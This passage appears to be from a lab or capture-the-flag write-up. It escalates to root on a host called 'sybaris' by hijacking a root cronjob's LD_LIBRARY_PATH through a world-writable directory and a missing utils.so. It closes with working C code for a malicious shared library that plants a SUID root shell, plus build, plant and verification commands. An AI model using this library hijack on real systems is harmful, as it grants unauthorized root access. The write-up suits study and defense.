Cronjob
[pablo@sybaris /]$ cat /etc/crontab | grep -v '^#'
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
* * * * * root /usr/bin/log-sweeper
A system-wide root cronjob has been identified: /etc/crontab runs /usr/bin/log-sweeper as root every minute, with its own PATH and LD_LIBRARY_PATH environment. This was also confirmed by PEAS at a later stage.
Writable LD_LIBRARY_PATH
[pablo@sybaris /]$ ll /usr/local/lib/dev
total 0
0 drwxrwxrwx 2 root root 6 Sep 7 2020 .
0 drwxr-xr-x. 4 root root 30 Sep 7 2020 ..
Another important detail is that the LD_LIBRARY_PATH set in the crontab above includes /usr/local/lib/dev, a directory that is world-writable (mode drwxrwxrwx) and currently empty, so any user can drop a shared object there.
log-sweeper
[pablo@sybaris /]$ ll /usr/bin/log-sweeper
12K -rwxr-xr-x. 1 root root 8.6K Sep 4 2020 /usr/bin/log-sweeper
[pablo@sybaris /]$ file /usr/bin/log-sweeper
/usr/bin/log-sweeper: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=b2507ccc8c1256db736f2a6c007d8993605e51fb, not stripped
log-sweeper is a custom, dynamically linked 64-bit ELF binary. It is not stripped, so its symbol names are still visible.
[pablo@sybaris /]$ strings /usr/bin/log-sweeper
/lib64/ld-linux-x86-64.so.2
so*l
utils.so
__gmon_start__
ends_with
print_yellow
print_red
_init
print_green
_fini
libc.so.6
readdir
sprintf
perror
closedir
remove
opendir
__libc_start_main
_edata
__bss_start
_end
GLIBC_2.2.5
5"
%$
%"
[]A\A]A^A_
/var/log
opendir
/var/log/%s
;*3$"
GCC: (GNU) 4.8.5 20150623 (Red Hat 4.8.5-39)
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6355
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
sweeper.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
remove@@GLIBC_2.2.5
print_green
print_yellow
_edata
opendir@@GLIBC_2.2.5
closedir@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
readdir@@GLIBC_2.2.5
__libc_csu_init
__bss_start
main
ends_with
print_red
perror@@GLIBC_2.2.5
sprintf@@GLIBC_2.2.5
__TMC_END__
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
The strings reveal the binary's dynamic dependencies: /lib64/ld-linux-x86-64.so.2 is the program interpreter (the dynamic loader), and the binary is linked against libc.so.6 and a non-standard utils.so. The functions ends_with, print_yellow, print_red and print_green carry no GLIBC version suffix, unlike the libc imports, so they are expected to be resolved from utils.so. The /var/log and /var/log/%s strings next to opendir, readdir, sprintf and remove suggest that the program iterates over /var/log and deletes files whose names match some suffix, which is consistent with the source file name sweeper.c.
[pablo@sybaris /]$ /usr/bin/log-sweeper
/usr/bin/log-sweeper: error while loading shared libraries: utils.so: cannot open shared object file: No such file or directory
Executing the binary as pablo shows something even more interesting: the dynamic loader fails to find the required utils.so. The interactive shell has no LD_LIBRARY_PATH set, so this proves utils.so is absent from the default system library directories; whether the cron run also fails depends on what is in the crontab's LD_LIBRARY_PATH directories, and /usr/local/lib/utils is worth checking for an existing copy as well.
Given that one of the LD_LIBRARY_PATH directories is writable by anyone, and that the loader searches LD_LIBRARY_PATH entries in the listed order before the default system directories, a utils.so planted in /usr/local/lib/dev will be picked up the next time the cronjob runs log-sweeper and will execute as root, provided no other utils.so exists in /usr/lib or /usr/lib64. The planted library should export the symbols the binary imports (ends_with, print_yellow, print_red, print_green) so that loading and symbol resolution succeed, and it can carry its payload in a constructor so the code runs before main. Note that LD_LIBRARY_PATH is ignored for setuid binaries, but that restriction does not apply here: cron simply runs the binary as root with the crontab's environment.
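The following drop-in utils.so is an added example written for this writeup, not code from the original page or from the target system. It assumes the signatures of the four imported functions (only the names are known from the strings output), that the root cron inherits the crontab's LD_LIBRARY_PATH, and that a SUID copy of bash in /tmp/.rootbash is the desired payload; all three are assumptions. The payload is guarded on effective uid 0 so that testing the library as pablo has no side effects.

```c
/* utils.c: replacement utils.so for /usr/bin/log-sweeper (added example).
 *
 * Build and plant into the world-writable LD_LIBRARY_PATH entry:
 *   gcc -shared -fPIC -o /usr/local/lib/dev/utils.so utils.c
 *
 * The root cronjob runs log-sweeper every minute with the crontab's
 * LD_LIBRARY_PATH, so the loader maps this file and runs the constructor
 * before main(). Function signatures below are assumptions: only the
 * symbol names are known from `strings /usr/bin/log-sweeper`.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Payload: executed by the dynamic loader at library load time.
 * Guarded on euid 0 so a manual test run as pablo does nothing. */
__attribute__((constructor))
static void plant(void)
{
    if (geteuid() != 0)
        return;
    /* Assumed payload: leave a SUID root shell behind. Any root action
     * (adding a sudoers entry, a reverse shell, ...) would work the same. */
    int rc = system("cp /bin/bash /tmp/.rootbash && chmod 4755 /tmp/.rootbash");
    (void)rc;
}

/* Symbols the binary imports. They are implemented sensibly rather than
 * stubbed so that log-sweeper keeps working and nothing looks broken in
 * the cron output. Returns 1 if s ends with suffix, otherwise 0. */
int ends_with(const char *s, const char *suffix)
{
    size_t len_s = strlen(s);
    size_t len_suf = strlen(suffix);
    if (len_suf > len_s)
        return 0;
    return strcmp(s + len_s - len_suf, suffix) == 0;
}

void print_green(const char *msg)  { printf("\033[32m%s\033[0m\n", msg); }
void print_yellow(const char *msg) { printf("\033[33m%s\033[0m\n", msg); }
void print_red(const char *msg)    { printf("\033[31m%s\033[0m\n", msg); }
```

Before waiting for the cron tick, confirm the dependency list with `readelf -d /usr/bin/log-sweeper | grep NEEDED` and check resolution under the crontab's environment with `LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils ldd /usr/bin/log-sweeper`: utils.so should now resolve to the planted file and no symbol should be reported missing. Running the binary as pablo afterwards is a harmless smoke test because of the euid guard; the SUID shell should appear within a minute once root's cron picks it up.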